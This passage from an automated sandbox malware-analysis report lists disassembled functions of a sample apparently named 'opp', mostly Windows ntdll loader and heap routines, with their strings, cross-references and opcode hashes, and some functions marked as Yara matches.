                                                              Strings
                                                              • apphelp.dll, xrefs: 016B2462
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 016FA9A2
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 016FA992
                                                              • LdrpDynamicShimModule, xrefs: 016FA998
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: 613d2126f76c47d0dc38d33368ce21404de6de444a81bcfea3f90802a960767b
                                                              • Instruction ID: 9268dca700a3cd38aeec3a275a9a319621abca1225f80436411a789fb84b38eb
                                                              • Opcode Fuzzy Hash: 613d2126f76c47d0dc38d33368ce21404de6de444a81bcfea3f90802a960767b
                                                              • Instruction Fuzzy Hash: B0318D71690201EBDB319F9DCC84EAEBBB5FB80B20F25406DFA056B345C770A982C790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016A29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • HEAP: , xrefs: 016A3264
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 016A327D
                                                              • HEAP[%wZ]: , xrefs: 016A3255
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-617086771
                                                              • Opcode ID: 672364950cbfa1712afa705715d6f2b98cc28aaf4c6cce93f031a8faed758495
                                                              • Instruction ID: 1cd5dc9b23ffc7ca206fd2c19d59598e3bd00980fc679977374d79ff0db9bd4b
                                                              • Opcode Fuzzy Hash: 672364950cbfa1712afa705715d6f2b98cc28aaf4c6cce93f031a8faed758495
                                                              • Instruction Fuzzy Hash: FA929971A042499FDB25CFA8C8547AABBF1FF08304F58809DE94AAB352D735AD42CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017202C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                              • API String ID: 0-1670051934
                                                              • Opcode ID: c6348d62a5da54e8daa929dc999063b48fed1cbd51d810d2fcedcc7d6afc67bf
                                                              • Instruction ID: ba6824e058061e2e42a101d78890d1418a2033d44f85257cee8372ced1de3a98
                                                              • Opcode Fuzzy Hash: c6348d62a5da54e8daa929dc999063b48fed1cbd51d810d2fcedcc7d6afc67bf
                                                              • Instruction Fuzzy Hash: 68227E72A047528FD724CF2DC89162AFBE2BBD4310F24892EF2DA87650D771E546CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016A0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: f3760aaf6bfbc07dc941e1b98f364dc331d7fe36589c1ecfbf6f44391326bc42
                                                              • Instruction ID: c12ff052d46ff58d482f4eccc2e182e2b30a66b11542089525dd35412283011e
                                                              • Opcode Fuzzy Hash: f3760aaf6bfbc07dc941e1b98f364dc331d7fe36589c1ecfbf6f44391326bc42
                                                              • Instruction Fuzzy Hash: C5F19B34A00606DFEB25CF68C894B6ABBB5FF45304F5482A8E5169B396D730ED81CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016B6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $@
                                                              • API String ID: 0-1077428164
                                                              • Opcode ID: 8c292b3093c629f545efcfd3e3ba4d786c42d84cb5234efcc3edc461e6239291
                                                              • Instruction ID: 87b50d10f3eafd7a649eca1cab6ec1978504c70bc6818805e9c5fb5ffe247898
                                                              • Opcode Fuzzy Hash: 8c292b3093c629f545efcfd3e3ba4d786c42d84cb5234efcc3edc461e6239291
                                                              • Instruction Fuzzy Hash: 13C26E71A083559FD725CF28CC81BABBBE5AFC8754F04892DEA8987381D734D885CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0168A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: 1c86db3dc7d1ee8bc19be6178c18af6dbdad30c9dbf9639a057199f89146cbc6
                                                              • Instruction ID: 0186883dd15d79262ae07372c4694133bf1efb66950b707a742d159e8f267638
                                                              • Opcode Fuzzy Hash: 1c86db3dc7d1ee8bc19be6178c18af6dbdad30c9dbf9639a057199f89146cbc6
                                                              • Instruction Fuzzy Hash: CBA19F71D112299BDB31DF68CC98BEAB7B9EF48700F1042EAD909A7210D7359E84CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016B0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpCheckModule, xrefs: 016FA117
                                                              • Failed to allocated memory for shimmed module list, xrefs: 016FA10F
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 016FA121
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              • Opcode ID: 73bd2d5f6caa39eb31d5ec53207111799e5423241c9b656fba04347edd4a9f5b
                                                              • Instruction ID: 8f7fae0a2866380fdd8accc0c3851a26005a6f237ece47a9cabed8f437bc9c64
                                                              • Opcode Fuzzy Hash: 73bd2d5f6caa39eb31d5ec53207111799e5423241c9b656fba04347edd4a9f5b
                                                              • Instruction Fuzzy Hash: 2B71CE71A402059FDB25DFA8CD81ABEBBF5FB44714F24806DE906AB351E734A982CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016A0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              • Opcode ID: 144f49f40484355d701f7a95d195c2b67ec1d4ebc1882f9d9f7b2683edab281c
                                                              • Instruction ID: 2f50439385bed0803616cb7bea985ebb12afa0d739c959f23ed25a6d36e268b8
                                                              • Opcode Fuzzy Hash: 144f49f40484355d701f7a95d195c2b67ec1d4ebc1882f9d9f7b2683edab281c
                                                              • Instruction Fuzzy Hash: D461BD716003019FDB29CF28C980B6ABBE1FF45704F54855DE95A8B396D771EC81CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016CC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 017082DE
                                                              • Failed to reallocate the system dirs string !, xrefs: 017082D7
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017082E8
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              • Opcode ID: a5c7873f99295b52118b1d5d537fed1d3056721c64ebdab1a2b32de13c2dae77
                                                              • Instruction ID: c046fe4d391440f4d6ddf31e1dfff51569c48983939dc5ff815606a14e0de03c
                                                              • Opcode Fuzzy Hash: a5c7873f99295b52118b1d5d537fed1d3056721c64ebdab1a2b32de13c2dae77
                                                              • Instruction Fuzzy Hash: C0410771584301ABC721EB68DC44B6FBBE9EF54B64F10852EF949D7290E770D800CBA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0174C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • @, xrefs: 0174C1F1
                                                              • PreferredUILanguages, xrefs: 0174C212
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0174C1C5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: 161ba5e57b672676e39250a11cc1cc8ba8d82f480a46dd35c4f434f22d143206
                                                              • Instruction ID: 36971d03688b40f10ff2bc8c65a037d35e6cabd24097ee402ef57c312aaca97b
                                                              • Opcode Fuzzy Hash: 161ba5e57b672676e39250a11cc1cc8ba8d82f480a46dd35c4f434f22d143206
                                                              • Instruction Fuzzy Hash: A6418571E05219EBDB12DED9CC51FEEFBB9BB14704F00416AE605B7240D7B49A44CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01724144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: 3f11ed07691718c521a25e567bdd5a238adf297d44f36110ab78e770a73e5187
                                                              • Instruction ID: af9829de1c5f913aa99d517c871c9aa6502ac86073813ddc44b1dab13ad4c1df
                                                              • Opcode Fuzzy Hash: 3f11ed07691718c521a25e567bdd5a238adf297d44f36110ab78e770a73e5187
                                                              • Instruction Fuzzy Hash: 6A41E232A04268CBEB26DBD9CC44BADFBF9FF56340F240459D902EB781D6748902CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01714755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01714888
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01714899
                                                              • LdrpCheckRedirection, xrefs: 0171488F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              • Opcode ID: 263a7e763ec1c27409100992e0987338ec7bee1d988344b7b6d507115c55d2ae
                                                              • Instruction ID: a2a90a061c74bcba5566225cde3177258fcafd2bfa456a53e2afc609a7dd398a
                                                              • Opcode Fuzzy Hash: 263a7e763ec1c27409100992e0987338ec7bee1d988344b7b6d507115c55d2ae
                                                              • Instruction Fuzzy Hash: 2041D272A542519FCB22CE5DD840A26FBE5EF49B60F0905ADED4AE7319D730D800CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016A0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              • Opcode ID: 3baa124d6abc5f00e35d89d7ff213558eabed967615cac4d84798aa54760cfe5
                                                              • Instruction ID: 34a6406b4e7f820ef15730f69ef65281c3a7b424895732a2e882dcf8c8a11d42
                                                              • Opcode Fuzzy Hash: 3baa124d6abc5f00e35d89d7ff213558eabed967615cac4d84798aa54760cfe5
                                                              • Instruction Fuzzy Hash: 4311DC313561029FDB29DE18CC81B6AB3A9EF41B26F18826DF507CB251DB34EC41CB99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 017120FA
                                                              • Process initialization failed with status 0x%08lx, xrefs: 017120F3
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01712104
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: e806ce78dd70d00c76247f6f8dae81d34c2c8389a07ebb3834b111bda0b239b0
                                                              • Instruction ID: cd6812291f533d13909855071b8a850e3b331b974d420989a6736a06112cc490
                                                              • Opcode Fuzzy Hash: e806ce78dd70d00c76247f6f8dae81d34c2c8389a07ebb3834b111bda0b239b0
                                                              • Instruction Fuzzy Hash: 26F04C74780308BFE720E60DDC57F99BB68FB41B24F20005DF60077289D5B0E940C641
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016A03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: 9407ebfaab16d493e91f226420a677dd8aaa33b262c1649f8ea64ca5b409bc6f
                                                              • Instruction ID: e8705d2c0352b8ae47edb28f9ccb1e0b4659c98297a5b0fe0d680097528df435
                                                              • Opcode Fuzzy Hash: 9407ebfaab16d493e91f226420a677dd8aaa33b262c1649f8ea64ca5b409bc6f
                                                              • Instruction Fuzzy Hash: 2A712772A0114A9FDB01DFA8CD94BAEB7F9FF08704F144069EA05A7251EB34AD41CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016A52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@
                                                              • API String ID: 0-149943524
                                                              • Opcode ID: 48810337c495e2f27283be025c81af258c8caab7414faaf3d2b14be29d5f11d2
                                                              • Instruction ID: 47e84923246676a75c7afb3cda131d46744ff45da32204452b323186f4d97941
                                                              • Opcode Fuzzy Hash: 48810337c495e2f27283be025c81af258c8caab7414faaf3d2b14be29d5f11d2
                                                              • Instruction Fuzzy Hash: B63269715083618BD724CF19C880B3EBBE1EF85754F94491EEA969B2A0E734DC85CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401580 Relevance: 3.0, Strings: 2, Instructions: 461COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: S u2$ww0f
                                                              • API String ID: 0-1271058379
                                                              • Opcode ID: e834d7a33adf644ef6f74fb62b784a9568ed97c6b40fe71e60111a4f00eee4d9
                                                              • Instruction ID: ae6051617825ea8e85e31057bc4fa61a1ff960f8064dadee764b711c1a5d971b
                                                              • Opcode Fuzzy Hash: e834d7a33adf644ef6f74fb62b784a9568ed97c6b40fe71e60111a4f00eee4d9
                                                              • Instruction Fuzzy Hash: E2E1CB726082C28FC316DB2498945D6BFA1FF1235473842BFC0946F2E2D73A9947CB99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0169A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrResSearchResource Exit, xrefs: 0169AA25
                                                              • LdrResSearchResource Enter, xrefs: 0169AA13
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              • Opcode ID: 3f81c73c8900e982671b4ccf28721e8c5a26cb59961be2a403d8ddcc3822bf02
                                                              • Instruction ID: 5c0f6e5504449c53e1bb4e5b66e8e07637531d21128b39801350924d258cd420
                                                              • Opcode Fuzzy Hash: 3f81c73c8900e982671b4ccf28721e8c5a26cb59961be2a403d8ddcc3822bf02
                                                              • Instruction Fuzzy Hash: 9EE16B71A01219ABEF22CEDDCD94BAEBBBEBB04314F10452AEA01E7355D778D941CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0175A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: d5c6a89dbab99935756f3c8ee699fa59f769881a405d87ff1edc16f4cd0950b3
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: EFC1CF312043429BEB65CE28C844B6BFBE5EFC4318F184A3DFA968B291D7B5D505CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01690CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Failed to retrieve service checksum., xrefs: 016EEE56
                                                              • ResIdCount less than 2., xrefs: 016EEEC9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                              • API String ID: 0-863616075
                                                              • Opcode ID: 9f1cd7256b4fca57d30eee884a24e6126b6706067adf562217d137e55a0f56ed
                                                              • Instruction ID: db0e7d7dfa82ec6dd705c380a8c1b2166c816b6d7f4e1b89be5c383e649b92fd
                                                              • Opcode Fuzzy Hash: 9f1cd7256b4fca57d30eee884a24e6126b6706067adf562217d137e55a0f56ed
                                                              • Instruction Fuzzy Hash: 56E104B19087449FE324CF19C444BABFBE4FB88714F008A2EE5998B380D7719909CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004025C0 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gfff$yxxx
                                                              • API String ID: 0-1072206253
                                                              • Opcode ID: e967f69cc9851081d0c34576d7235b2b298e5c7ecc126c414244e478b8b62c75
                                                              • Instruction ID: 95ddaf8593c128b1c82fadbf99d001a19d57a0c6c781f683c6af3314a7f2439d
                                                              • Opcode Fuzzy Hash: e967f69cc9851081d0c34576d7235b2b298e5c7ecc126c414244e478b8b62c75
                                                              • Instruction Fuzzy Hash: 5081B636F0011A8BCB188E5DCE8556AB3A5EB94304F58817BED45EF3D1E6B8ED11C784
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004025B3 Relevance: 2.7, Strings: 2, Instructions: 225COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gfff$yxxx
                                                              • API String ID: 0-1072206253
                                                              • Opcode ID: f0e0d837c9b30ad83f4d9c8ac5295b670addbe7599368264ddf6585a7cd60706
                                                              • Instruction ID: 04050b9808641f22a6383518cc998fbec0d528a8a2deac1f59cd82f594b24d48
                                                              • Opcode Fuzzy Hash: f0e0d837c9b30ad83f4d9c8ac5295b670addbe7599368264ddf6585a7cd60706
                                                              • Instruction Fuzzy Hash: 1471BA72F0011A8BCB18CD1DCE8555AB7A5EBA4304B58817BED45EF3D1E5B8ED11C784
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004025F9 Relevance: 2.7, Strings: 2, Instructions: 204COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gfff$yxxx
                                                              • API String ID: 0-1072206253
                                                              • Opcode ID: 5e2965fea6f8fbde7b83e4f315125a72ef80eb54538c022ca62347f8a7d5d001
                                                              • Instruction ID: e27d41070539eca58c56905b890884c2de6afd08bd8b4667aeab06d0303cd13f
                                                              • Opcode Fuzzy Hash: 5e2965fea6f8fbde7b83e4f315125a72ef80eb54538c022ca62347f8a7d5d001
                                                              • Instruction Fuzzy Hash: 5361A636F0011A4BCB188E1DCE8566AB3A5EBA8304F58817BED45EF3D1E5B8ED118784
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0170E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: fdaa9c75a270def354991789310987399072ae80e635758170382edf705699c2
                                                              • Instruction ID: 7fe94029a7ef846abe1824286db86367884db8ed360f9f88746039f64132d331
                                                              • Opcode Fuzzy Hash: fdaa9c75a270def354991789310987399072ae80e635758170382edf705699c2
                                                              • Instruction Fuzzy Hash: AF613C71E44309DFDB15DFA88840AAEFBF9FB44704F14486EE649EB291DB31A940CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              • Opcode ID: d0fa7fe7be17ba7b448e8595b91a4e1ab2923f9d2306cffb70130ebf7399cffc
                                                              • Instruction ID: 32ff261eea89696f0778cfeaf0fa097e1c69bde748ab4e43982d48875cc25d47
                                                              • Opcode Fuzzy Hash: d0fa7fe7be17ba7b448e8595b91a4e1ab2923f9d2306cffb70130ebf7399cffc
                                                              • Instruction Fuzzy Hash: 5E5136B1E0021DAFDF11DFA9CC90AEEBBBDEB44754F100529E612A7281D7349E05CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0169063D
                                                              • kLsE, xrefs: 01690540
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              • Opcode ID: 2c51eafffa95cfbbe49ab2be01db7683034bdb9888c7b3e90c5679f45a8bbfa7
                                                              • Instruction ID: e5271b5c335340c6bdac605c278326cad85d43a1bbbe82bb7462350c3399b307
                                                              • Opcode Fuzzy Hash: 2c51eafffa95cfbbe49ab2be01db7683034bdb9888c7b3e90c5679f45a8bbfa7
                                                              • Instruction Fuzzy Hash: 1B51D1715047429FDB24DF68C9406A7BBEDAF85314F10883EFAAA87341E730E545CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402ED0 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
